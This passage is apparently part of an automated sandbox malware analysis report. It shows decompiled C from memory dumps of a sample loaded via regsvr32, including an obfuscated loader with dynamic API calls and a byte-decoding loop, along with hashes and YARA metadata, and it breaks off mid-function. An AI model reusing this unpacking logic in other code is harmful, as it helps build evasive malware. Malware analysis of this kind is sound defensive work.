                                          								 *0x0086AF44 =  *0x0086AF44 & 0x00000000;
                                          								 *0x0086AF44 =  *0x0086AF44 | _t398 -  *(_t423 - 0x20) | _t297;
                                          								_t398 =  *(_t423 - 0x20);
                                          								_t281 =  *_t439;
                                          								_t439 =  &(_t439[1]);
                                          							}
                                          							 *0x0086B0CD =  *0x0086B0CD & 0x00000000;
                                          							 *0x0086B0CD =  *0x0086B0CD | _t353 -  *_t439 ^ _t281;
                                          							_t353 = _t353;
                                          							if( *0x0086AFC0 == 0) {
                                          								_push(9);
                                          								_push(0);
                                          								_t281 =  *((intOrPtr*)(0x876740))();
                                          								 *0x0086AFC0 =  *0x0086AFC0 & 0x00000000;
                                          								 *0x0086AFC0 =  *0x0086AFC0 | _t379 -  *_t439 ^ _t281;
                                          								_t379 = _t379;
                                          							}
                                          						}
                                          						 *(_t423 - 8) = 2;
                                          						if( *0x0086AE56 == 0) {
                                          							_t281 =  *0x008766F4();
                                          							 *(_t423 - 0x20) = _t398;
                                          							 *0x0086AE56 =  *0x0086AE56 & 0x00000000;
                                          							 *0x0086AE56 =  *0x0086AE56 ^ (_t398 & 0x00000000 | _t281);
                                          							_t398 =  *(_t423 - 0x20);
                                          						}
                                          					}
                                          					goto L49;
                                          				} else {
                                          					if( *0x0086A9EE == 0) {
                                          						_push( *0x0086AFA8);
                                          						_push(0);
                                          						_t281 =  *((intOrPtr*)(0x876740))();
                                          						 *(_t423 - 0x1c) = _t353;
                                          						 *0x0086A9EE = 0 ^ _t281;
                                          						_t353 =  *(_t423 - 0x1c);
                                          					}
                                          					 *(_t423 - 0x14) = 3;
                                          					if( *0x0086A9A7 == 0) {
                                          						_t281 =  *((intOrPtr*)(0x8766f8))();
                                          						 *(_t423 - 0x20) = _t398;
                                          						 *0x0086A9A7 =  *0x0086A9A7 & 0x00000000;
                                          						 *0x0086A9A7 =  *0x0086A9A7 | _t398 & 0x00000000 | _t281;
                                          						_t398 =  *(_t423 - 0x20);
                                          					}
                                          					if( *0x0086A96B == 0) {
                                          						_t305 = 0x86aa42;
                                          						if( *0x0086AEA2 == 0) {
                                          							_push(_t305);
                                          							_push( *0x0086AD61);
                                          							_t306 =  *((intOrPtr*)(0x87673c))();
                                          							 *(_t423 - 0x1c) = _t398;
                                          							 *0x0086AEA2 = 0 ^ _t306;
                                          							_t398 =  *(_t423 - 0x1c);
                                          							_t305 =  *_t439;
                                          							_t439 = _t439 - 0xfffffffc;
                                          						}
                                          						_push(_t305);
                                          						_t281 =  *0x008766FC();
                                          						 *0x0086A96B =  *0x0086A96B & 0x00000000;
                                          						 *0x0086A96B =  *0x0086A96B ^ (_t353 & 0x00000000 | _t281);
                                          						_t353 = _t353;
                                          					}
                                          					 *(_t423 - 4) = 0x11;
                                          					if( *0x0086AC45 == 0) {
                                          						_push(0x86af34);
                                          						_t281 =  *0x00876700();
                                          						 *0x0086AC45 =  *0x0086AC45 & 0x00000000;
                                          						 *0x0086AC45 =  *0x0086AC45 | _t337 & 0x00000000 ^ _t281;
                                          						_t337 = _t337;
                                          					}
                                          					if( *0x0086AB16 == 0) {
                                          						if( *0x0086AF40 == 0) {
                                          							_push( *0x0086A6D0);
                                          							_t303 =  *((intOrPtr*)(0x87673c))();
                                          							 *0x0086AF40 =  *0x0086AF40 & 0x00000000;
                                          							 *0x0086AF40 =  *0x0086AF40 | _t353 & 0x00000000 ^ _t303;
                                          							_t353 = _t353;
                                          						}
                                          						_push( *0x0086ADE2);
                                          						_t281 =  *((intOrPtr*)(0x87673c))();
                                          						 *_t439 = _t423;
                                          						 *0x0086AB16 = 0 ^ _t281;
                                          						_t423 = 0;
                                          					}
                                          					 *(_t423 - 8) = 4;
                                          					if( *0x0086A764 == 0) {
                                          						_t281 =  *((intOrPtr*)(0x8766f0))();
                                          						 *0x0086A764 =  *0x0086A764 & 0x00000000;
                                          						 *0x0086A764 =  *0x0086A764 ^ _t423 & 0x00000000 ^ _t281;
                                          						_t423 = _t423;
                                          					}
                                          					if( *0x0086A740 == 0) {
                                          						_t281 =  *((intOrPtr*)(0x8766f0))();
                                          						if( *0x0086A9AB == 0) {
                                          							_push(_t281);
                                          							_t301 =  *((intOrPtr*)(0x8766f8))();
                                          							 *(_t423 - 0x1c) = _t398;
                                          							 *0x0086A9AB =  *0x0086A9AB & 0x00000000;
                                          							 *0x0086A9AB =  *0x0086A9AB | _t398 & 0x00000000 ^ _t301;
                                          							_t398 =  *(_t423 - 0x1c);
                                          							_t281 =  *_t439;
                                          							_t439 = _t439 - 0xfffffffc;
                                          						}
                                          						 *(_t423 - 0x1c) = _t379;
                                          						 *0x0086A740 = _t281;
                                          						_t379 =  *(_t423 - 0x1c);
                                          						if( *0x0086AF1C == 0) {
                                          							_push(0x1000);
                                          							_push(0x4b);
                                          							_push( *0x0086ABE1);
                                          							_push( *0x0086A6D4);
                                          							_push( *0x0086AAAE);
                                          							_push( *0x0086AC2D);
                                          							_push( *0x0086AC59);
                                          							_t281 =  *0x00876738();
                                          							 *(_t423 - 0x1c) = _t379;
                                          							 *0x0086AF1C = _t281;
                                          							_t379 =  *(_t423 - 0x1c);
                                          						}
                                          					}
                                          					L49:
                                          					 *_t439 =  *_t439 ^ _t353;
                                          					_t354 = _t353;
                                          					if( *0x0086B0D1 == 0) {
                                          						_push(_t354);
                                          						_push( *0x0086A7B2);
                                          						_push( *0x0086AEB9);
                                          						_push(0x12e);
                                          						_push(0x3d);
                                          						_push( *0x0086AE72);
                                          						_push(2);
                                          						_push( *0x0086AFE8);
                                          						_t281 =  *((intOrPtr*)(0x876738))();
                                          						 *_t439 = _t423;
                                          						 *0x0086B0D1 = 0 ^ _t281;
                                          						_t423 = 0;
                                          						_t439 = _t439 - 0xfffffffc;
                                          					}
                                          					 *(_t423 - 0x20) = 0x435698;
                                          					_t283 = _t281 & 0x00000000 | 0x435698 ^  *(_t423 - 0x20) ^  *(_t423 - 0x10);
                                          					_t318 =  *(_t423 - 0x20);
                                          					_t284 = _t283 /  *(_t423 - 8);
                                          					_t355 = _t283 %  *(_t423 - 8);
                                          					if( *(_t318 + 0x435651) == 0) {
                                          						_t291 =  *((intOrPtr*)(_t318 + 0x441044))(_t318 + 0x435544, _t318 + 0x435243, _t355);
                                          						 *(_t423 - 0x1c) = _t337;
                                          						 *(_t318 + 0x435167) =  *(_t318 + 0x435167) & 0x00000000;
                                          						 *(_t318 + 0x435167) =  *(_t318 + 0x435167) ^ (_t337 -  *(_t423 - 0x1c) | _t291);
                                          						_t337 =  *(_t423 - 0x1c);
                                          						_t443 = _t439 - 0xfffffffc;
                                          						_push( *((intOrPtr*)(_t318 + 0x441044))(_t318 + 0x435352, _t318 + 0x435685,  *_t439));
                                          						_pop( *_t223);
                                          						_push( *(_t423 - 0x20));
                                          						_pop( *_t225);
                                          						_push(0);
                                          						if( *(_t318 + 0x4351fb) == 0) {
                                          							_t296 =  *((intOrPtr*)(_t318 + 0x441064))(_t318 + 0x43568a);
                                          							 *(_t423 - 0x20) = _t398;
                                          							 *(_t318 + 0x4351fb) =  *(_t318 + 0x4351fb) & 0x00000000;
                                          							 *(_t318 + 0x4351fb) =  *(_t318 + 0x4351fb) ^ (_t398 & 0x00000000 | _t296);
                                          							_t398 =  *(_t423 - 0x20);
                                          						}
                                          						_t284 =  *((intOrPtr*)(_t318 + 0x441070))();
                                          						 *(_t318 + 0x435651) =  *(_t318 + 0x435651) & 0x00000000;
                                          						 *(_t318 + 0x435651) =  *(_t318 + 0x435651) | _t423 & 0x00000000 | _t284;
                                          						_t423 = _t423;
                                          						_t355 = 0 ^  *_t443;
                                          						_t439 =  &(_t443[1]);
                                          					}
                                          					 *(_t423 - 0x10) =  *(_t423 - 0x10) - _t355;
                                          					_t321 = _t318;
                                          					 *(_t423 - 0x1c) = _t379;
                                          					 *(_t423 - 0x18) =  *(_t423 - 0x18) & 0x00000000;
                                          					 *(_t423 - 0x18) =  *(_t423 - 0x18) | _t379 -  *(_t423 - 0x1c) ^ _t355;
                                          					_t382 =  *(_t423 - 0x1c);
                                          					if( *(_t321 + 0x4355a9) == 0) {
                                          						_t284 =  *((intOrPtr*)(_t321 + 0x441060))();
                                          						 *(_t423 - 0x1c) = _t337;
                                          						 *(_t321 + 0x4355a9) = 0 ^ _t284;
                                          					}
                                          					_t400 = _t398 & 0x00000000 | _t321 -  *_t439 |  *(_t423 + 8);
                                          					_t324 = _t321;
                                          					_t384 = _t382 & 0x00000000 ^ (_t355 -  *_t439 | _t400);
                                          					_t358 = _t355;
                                          					if( *(_t324 + 0x435492) == 0) {
                                          						_t284 =  *((intOrPtr*)(_t324 + 0x441054))(_t324 + 0x435482);
                                          						 *(_t423 - 0x20) = _t384;
                                          						 *(_t324 + 0x435492) = 0 ^ _t284;
                                          						_t384 =  *(_t423 - 0x20);
                                          					}
                                          					_t401 = _t400 - 1;
                                          					_push(_t324);
                                          					do {
                                          						 *_t439 = _t324;
                                          						_t327 = 0;
                                          						if(((0 ^ _t384) &  *(_t423 - 0x14)) == 0) {
                                          							_t401 = _t401 + 1;
                                          							 *(_t423 - 0x20) = _t327;
                                          							_t284 = _t284 & 0x00000000 | _t327 & 0x00000000 |  *(_t423 - 8);
                                          							_t327 =  *(_t284 + _t401) & 0x000000ff;
                                          						}
                                          						 *(_t423 - 0x1c) = _t327;
                                          						_t324 =  *(_t423 - 0x1c);
                                          						asm("rol edx, cl");
                                          						_t358 = (_t358 & 0x00000000 ^ _t327 -  *(_t423 - 0x1c) ^  *(_t423 - 4)) & _t324;
                                          						asm("lodsb");
                                          						_t284 = _t284 | _t358;
                                          						 *_t384 = _t284;
                                          						_t384 = _t384 + 1;
                                          						_t270 = _t423 - 0x10;
                                          						 *_t270 =  *(_t423 - 0x10) - 1;
                                          					} while ( *_t270 != 0);
                                          					_t331 =  *_t439;
                                          					_t440 = _t439 - 0xfffffffc;
                                          					if( *((intOrPtr*)(_t331 + 0x435254)) == 0) {
                                          						_t287 =  *((intOrPtr*)(_t331 + 0x44105c))();
                                          						 *_t440 = _t423;
                                          						 *((intOrPtr*)(_t331 + 0x435254)) = _t287;
                                          						_t423 = 0;
                                          					}
                                          					 *(_t423 - 0x1c) = _t384;
                                          					_t286 = memcpy( *(_t423 - 0x1c), _t401 + 1, 0 ^  *(_t423 - 0x18));
                                          					_pop( *_t278);
                                          					return _t286;
                                          				}
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EVC
                                          • API String ID: 0-2317647041
                                          • Opcode ID: d630a207991558a04c9b35e2ebf4bac3101f74f6a982d320bbdcea0694b17e6c
                                          • Instruction ID: 4040785cac2f8e06af4d650afbbbbc98cdbb0c11d82d3c1cffcd59089639f78f
                                          • Opcode Fuzzy Hash: d630a207991558a04c9b35e2ebf4bac3101f74f6a982d320bbdcea0694b17e6c
                                          • Instruction Fuzzy Hash: CAE15D72C046099FEF04DFA4C98979ABBB1FF64311F0891A9DD0DAE049C77815A48F78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d45b2c36b56dd65acc4ad6610fefbd032e62ce2ab70fce9b6ac85e506ef420ee
                                          • Instruction ID: 9b1d4261e01ea6610c575b0134eba5985156301174fa142500f4415e0e400a37
                                          • Opcode Fuzzy Hash: d45b2c36b56dd65acc4ad6610fefbd032e62ce2ab70fce9b6ac85e506ef420ee
                                          • Instruction Fuzzy Hash: 9802DD6505E7C25ED3078B789C297D2BFB1AF07218F1D02CED4D08E1E3D619409ADB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
                                          				signed int _v8;
                                          				signed short* _v12;
                                          				char _v16;
                                          				signed short _v20;
                                          				unsigned int _v24;
                                          				signed short _v28;
                                          				signed int _t223;
                                          				signed int _t235;
                                          				signed int _t237;
                                          				signed short _t240;
                                          				signed int _t241;
                                          				signed short _t244;
                                          				signed int _t245;
                                          				signed short _t248;
                                          				signed int _t249;
                                          				signed int _t250;
                                          				void* _t254;
                                          				signed char _t259;
                                          				signed int _t275;
                                          				signed int _t289;
                                          				signed int _t308;
                                          				signed short _t316;
                                          				signed int _t321;
                                          				void* _t329;
                                          				signed short _t330;
                                          				signed short _t333;
                                          				signed short _t334;
                                          				signed short _t343;
                                          				signed short _t346;
                                          				signed short _t347;
                                          				signed short _t348;
                                          				signed short _t358;
                                          				signed short _t361;
                                          				signed short _t362;
                                          				signed short _t363;
                                          				signed short _t370;
                                          				signed int _t373;
                                          				signed int _t378;
                                          				signed short _t379;
                                          				signed short _t382;
                                          				unsigned int _t388;
                                          				unsigned short _t390;
                                          				unsigned short _t392;
                                          				unsigned short _t394;
                                          				signed int _t396;
                                          				signed int _t397;
                                          				signed int _t398;
                                          				signed int _t400;
                                          				signed short _t401;
                                          				signed int _t402;
                                          				signed int _t403;
                                          				signed int _t407;
                                          				signed int _t409;
                                          
                                          				_t223 = _a8;
                                          				_t235 =  *(_t223 + 2) & 0x0000ffff;
                                          				_push(_t397);
                                          				_t388 = 0;
                                          				_t398 = _t397 | 0xffffffff;
                                          				if(_a12 < 0) {
                                          					L42:
                                          					return _t223;
                                          				} else {
                                          					_t329 =  !=  ? 7 : 0x8a;
                                          					_v12 = _t223 + 6;
                                          					_t254 = (0 | _t235 != 0x00000000) + 3;
                                          					_v16 = _a12 + 1;
                                          					do {
                                          						_v24 = _t388;
                                          						_t388 = _t388 + 1;
                                          						_a8 = _t235;
                                          						_a12 = _t235;
                                          						_v8 =  *_v12 & 0x0000ffff;
                                          						_t223 = _a4;
                                          						if(_t388 >= _t329) {
                                          							L4:
                                          							if(_t388 >= _t254) {
                                          								if(_a8 == 0) {
                                          									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
                                          									_t400 =  *_t122;
                                          									if(_t388 > 0xa) {
                                          										_t168 = _t223 + 0xac4; // 0x5dc03300
                                          										_t330 =  *_t168 & 0x0000ffff;
                                          										_t169 = _t223 + 0xac6; // 0x55c35dc0
                                          										_t237 =  *_t169 & 0x0000ffff;
                                          										_v24 = _t330;
                                          										_t171 = _t223 + 0x16b8; // 0xfffffe8b
                                          										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
                                          										_v28 = _t333;
                                          										if(_t400 <= 0x10 - _t237) {
                                          											_t259 = _t400 + _t237;
                                          										} else {
                                          											_t173 = _t223 + 0x14; // 0xc703f045
                                          											 *(_t223 + 0x16b8) = _t333;
                                          											_t175 = _t223 + 8; // 0x8d000040
                                          											 *((char*)( *_t175 +  *_t173)) = _v28;
                                          											_t223 = _a4;
                                          											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          											_t181 = _t223 + 0x14; // 0xc703f045
                                          											_t182 = _t223 + 8; // 0x8d000040
                                          											_t183 = _t223 + 0x16b9; // 0x89fffffe
                                          											 *((char*)( *_t181 +  *_t182)) =  *_t183;
                                          											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          											_t333 = _v24 >> 0x10;
                                          											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
                                          											_t259 =  *_t189 + 0xfffffff0 + _t237;
                                          										}
                                          										_t334 = _t333 & 0x0000ffff;
                                          										 *(_t223 + 0x16bc) = _t259;
                                          										 *(_t223 + 0x16b8) = _t334;
                                          										_t401 = _t334 & 0x0000ffff;
                                          										if(_t259 <= 9) {
                                          											_t209 = _t388 - 0xb; // -10
                                          											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
                                          											 *(_t223 + 0x16bc) = _t259 + 7;
                                          										} else {
                                          											_t193 = _t223 + 8; // 0x8d000040
                                          											_t390 = _t388 + 0xfffffff5;
                                          											_t194 = _t223 + 0x14; // 0xc703f045
                                          											_t240 = _t390 << _t259 | _t401;
                                          											 *(_t223 + 0x16b8) = _t240;
                                          											 *( *_t193 +  *_t194) = _t240;
                                          											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          											_t199 = _t223 + 0x14; // 0xc703f045
                                          											_t200 = _t223 + 8; // 0x8d000040
                                          											_t201 = _t223 + 0x16b9; // 0x89fffffe
                                          											 *((char*)( *_t199 +  *_t200)) =  *_t201;
                                          											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
                                          											 *(_t223 + 0x16b8) = _t390 >> 0x10;
                                          										}
                                          										goto L35;
                                          									}
                                          									_t123 = _t223 + 0xac0; // 0x4e9
                                          									_t343 =  *_t123 & 0x0000ffff;
                                          									_t124 = _t223 + 0xac2; // 0x33000000
                                          									_t241 =  *_t124 & 0x0000ffff;
                                          									_v24 = _t343;
                                          									_t126 = _t223 + 0x16b8; // 0xfffffe8b
                                          									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
                                          									_v28 = _t346;
                                          									if(_t400 > 0x10 - _t241) {
                                          										_t128 = _t223 + 0x14; // 0xc703f045
                                          										 *(_t223 + 0x16b8) = _t346;
                                          										_t130 = _t223 + 8; // 0x8d000040
                                          										 *((char*)( *_t130 +  *_t128)) = _v28;
                                          										_t223 = _a4;
                                          										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          										_t136 = _t223 + 0x14; // 0xc703f045
                                          										_t137 = _t223 + 8; // 0x8d000040
                                          										_t138 = _t223 + 0x16b9; // 0x89fffffe
                                          										 *((char*)( *_t136 +  *_t137)) =  *_t138;
                                          										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
                                          										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          										_t346 = _v24 >> 0x10;
                                          										_t400 =  *_t142 + 0xfffffff0;
                                          									}
                                          									_t403 = _t400 + _t241;
                                          									_t347 = _t346 & 0x0000ffff;
                                          									 *(_t223 + 0x16bc) = _t403;
                                          									 *(_t223 + 0x16b8) = _t347;
                                          									_t348 = _t347 & 0x0000ffff;
                                          									if(_t403 <= 0xd) {
                                          										_t163 = _t403 + 3; // 0x8b3c7e8c
                                          										_t275 = _t163;
                                          										L28:
                                          										 *(_t223 + 0x16bc) = _t275;
                                          										_t165 = _t388 - 3; // -2
                                          										_t166 = _t223 + 0x16b8; // 0xfffffe8b
                                          										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
                                          									} else {
                                          										_t392 = _t388 + 0xfffffffd;
                                          										_t147 = _t223 + 0x14; // 0xc703f045
                                          										_t244 = _t392 << _t403 | _t348;
                                          										_t148 = _t223 + 8; // 0x8d000040
                                          										 *(_t223 + 0x16b8) = _t244;
                                          										 *( *_t148 +  *_t147) = _t244;
                                          										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          										_t153 = _t223 + 0x14; // 0xc703f045
                                          										_t154 = _t223 + 8; // 0x8d000040
                                          										_t155 = _t223 + 0x16b9; // 0x89fffffe
                                          										 *((char*)( *_t153 +  *_t154)) =  *_t155;
                                          										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
                                          										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
                                          									}
                                          									goto L35;
                                          								}
                                          								_t289 = _a12;
                                          								if(_t289 != _t398) {
                                          									_t53 = _t289 * 4; // 0x238830a
                                          									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
                                          									_t56 = _t235 * 4; // 0x830a74c0
                                          									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
                                          									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
                                          									_t407 =  *_t58;
                                          									_v28 = _t370;
                                          									_t60 = _t223 + 0x16b8; // 0xfffffe8b
                                          									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
                                          									if(_t407 <= 0x10 - _t396) {
                                          										_t373 = _t249;
                                          										_t308 = _t407 + _t396;
                                          									} else {
                                          										_t61 = _t223 + 0x14; // 0xc703f045
                                          										_t62 = _t223 + 8; // 0x8d000040
                                          										 *(_t223 + 0x16b8) = _t249;
                                          										 *( *_t62 +  *_t61) = _t249;
                                          										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          										_t67 = _t223 + 0x14; // 0xc703f045
                                          										_t68 = _t223 + 8; // 0x8d000040
                                          										_t69 = _t223 + 0x16b9; // 0x89fffffe
                                          										 *((char*)( *_t67 +  *_t68)) =  *_t69;
                                          										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
                                          										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
                                          										_t308 =  *_t75 + 0xfffffff0 + _t396;
                                          									}
                                          									_t388 = _v24;
                                          									 *(_t223 + 0x16bc) = _t308;
                                          									 *(_t223 + 0x16b8) = _t373;
                                          								}
                                          								_t80 = _t223 + 0xabc; // 0x5d0674c0
                                          								_t358 =  *_t80 & 0x0000ffff;
                                          								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
                                          								_t402 =  *_t81;
                                          								_t82 = _t223 + 0xabe; // 0x4e95d06
                                          								_t245 =  *_t82 & 0x0000ffff;
                                          								_v24 = _t358;
                                          								_t84 = _t223 + 0x16b8; // 0xfffffe8b
                                          								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
                                          								_v28 = _t361;
                                          								if(_t402 > 0x10 - _t245) {
                                          									_t86 = _t223 + 0x14; // 0xc703f045
                                          									 *(_t223 + 0x16b8) = _t361;
                                          									_t88 = _t223 + 8; // 0x8d000040
                                          									 *((char*)( *_t88 +  *_t86)) = _v28;
                                          									_t223 = _a4;
                                          									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          									_t94 = _t223 + 0x14; // 0xc703f045
                                          									_t95 = _t223 + 8; // 0x8d000040
                                          									_t96 = _t223 + 0x16b9; // 0x89fffffe
                                          									 *((char*)( *_t94 +  *_t95)) =  *_t96;
                                          									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
                                          									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          									_t361 = _v24 >> 0x10;
                                          									_t402 =  *_t100 + 0xfffffff0;
                                          								}
                                          								_t403 = _t402 + _t245;
                                          								_t362 = _t361 & 0x0000ffff;
                                          								 *(_t223 + 0x16bc) = _t403;
                                          								 *(_t223 + 0x16b8) = _t362;
                                          								_t363 = _t362 & 0x0000ffff;
                                          								if(_t403 <= 0xe) {
                                          									_t121 = _t403 + 2; // 0x8b3c7e8b
                                          									_t275 = _t121;
                                          									goto L28;
                                          								} else {
                                          									_t394 = _t388 + 0xfffffffd;
                                          									_t105 = _t223 + 0x14; // 0xc703f045
                                          									_t248 = _t394 << _t403 | _t363;
                                          									_t106 = _t223 + 8; // 0x8d000040
                                          									 *(_t223 + 0x16b8) = _t248;
                                          									 *( *_t106 +  *_t105) = _t248;
                                          									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          									_t111 = _t223 + 0x14; // 0xc703f045
                                          									_t112 = _t223 + 8; // 0x8d000040
                                          									_t113 = _t223 + 0x16b9; // 0x89fffffe
                                          									 *((char*)( *_t111 +  *_t112)) =  *_t113;
                                          									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
                                          									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
                                          									goto L35;
                                          								}
                                          							} else {
                                          								_t316 = _t223 + (_t235 + 0x29f) * 4;
                                          								_v28 = _t316;
                                          								do {
                                          									_t378 = _a12;
                                          									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
                                          									_t409 =  *_t22;
                                          									_t24 = _t378 * 4; // 0x238830a
                                          									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
                                          									_t379 =  *_t316 & 0x0000ffff;
                                          									_v24 = _t379;
                                          									_t27 = _t223 + 0x16b8; // 0xfffffe8b
                                          									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
                                          									_v20 = _t382;
                                          									if(_t409 <= 0x10 - _t250) {
                                          										_t321 = _t409 + _t250;
                                          									} else {
                                          										_t29 = _t223 + 0x14; // 0xc703f045
                                          										 *(_t223 + 0x16b8) = _t382;
                                          										_t31 = _t223 + 8; // 0x8d000040
                                          										 *((char*)( *_t31 +  *_t29)) = _v20;
                                          										_t223 = _a4;
                                          										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          										_t37 = _t223 + 0x14; // 0xc703f045
                                          										_t38 = _t223 + 8; // 0x8d000040
                                          										_t39 = _t223 + 0x16b9; // 0x89fffffe
                                          										 *((char*)( *_t37 +  *_t38)) =  *_t39;
                                          										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                          										_t382 = _v24 >> 0x10;
                                          										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
                                          										_t321 =  *_t45 + 0xfffffff0 + _t250;
                                          									}
                                          									 *(_t223 + 0x16bc) = _t321;
                                          									_t316 = _v28;
                                          									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
                                          									_t388 = _t388 - 1;
                                          								} while (_t388 != 0);
                                          								L35:
                                          								_t235 = _v8;
                                          								_t388 = 0;
                                          								_t398 = _a12;
                                          								if(_t235 != 0) {
                                          									if(_a8 != _t235) {
                                          										_t329 = 7;
                                          										_t217 = _t329 - 3; // 0x4
                                          										_t254 = _t217;
                                          									} else {
                                          										_t329 = 6;
                                          										_t216 = _t329 - 3; // 0x3
                                          										_t254 = _t216;
                                          									}
                                          								} else {
                                          									_t329 = 0x8a;
                                          									_t214 = _t388 + 3; // 0x3
                                          									_t254 = _t214;
                                          								}
                                          								goto L41;
                                          							}
                                          						}
                                          						_t223 = _a4;
                                          						if(_t235 == _v8) {
                                          							_t235 = _v8;
                                          							goto L41;
                                          						}
                                          						goto L4;
                                          						L41:
                                          						_v12 =  &(_v12[2]);
                                          						_t221 =  &_v16;
                                          						 *_t221 = _v16 - 1;
                                          					} while ( *_t221 != 0);
                                          					goto L42;
                                          				}
                                          			}
























































                                          0x10016f53
                                          0x10016f5c
                                          0x10016f5f
                                          0x10016f64
                                          0x10016fac
                                          0x10016f66
                                          0x10016f66
                                          0x10016f69
                                          0x10016f70
                                          0x10016f76
                                          0x10016f79
                                          0x10016f7c
                                          0x10016f7f
                                          0x10016f82
                                          0x10016f85
                                          0x10016f8b
                                          0x10016f99
                                          0x10016f9c
                                          0x10016f9f
                                          0x10016fa8
                                          0x10016fa8
                                          0x10016fb2
                                          0x10016fb8
                                          0x10016fbb
                                          0x10016fc2
                                          0x10016fc2
                                          0x10017375
                                          0x10017375
                                          0x10017378
                                          0x1001737a
                                          0x1001737f
                                          0x1001738e
                                          0x1001739a
                                          0x1001739f
                                          0x1001739f
                                          0x10017390
                                          0x10017390
                                          0x10017395
                                          0x10017395
                                          0x10017395
                                          0x10017381
                                          0x10017381
                                          0x10017386
                                          0x10017386
                                          0x10017386
                                          0x00000000
                                          0x1001737f
                                          0x10016f1e
                                          0x10016f13
                                          0x10016f16
                                          0x100173a4
                                          0x00000000
                                          0x100173a4
                                          0x00000000
                                          0x100173a7
                                          0x100173a7
                                          0x100173ab
                                          0x100173ab
                                          0x100173ab
                                          0x00000000
                                          0x10016ef4

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                          • Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
                                          • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                          • Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E00191827(void* __eax, void* __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
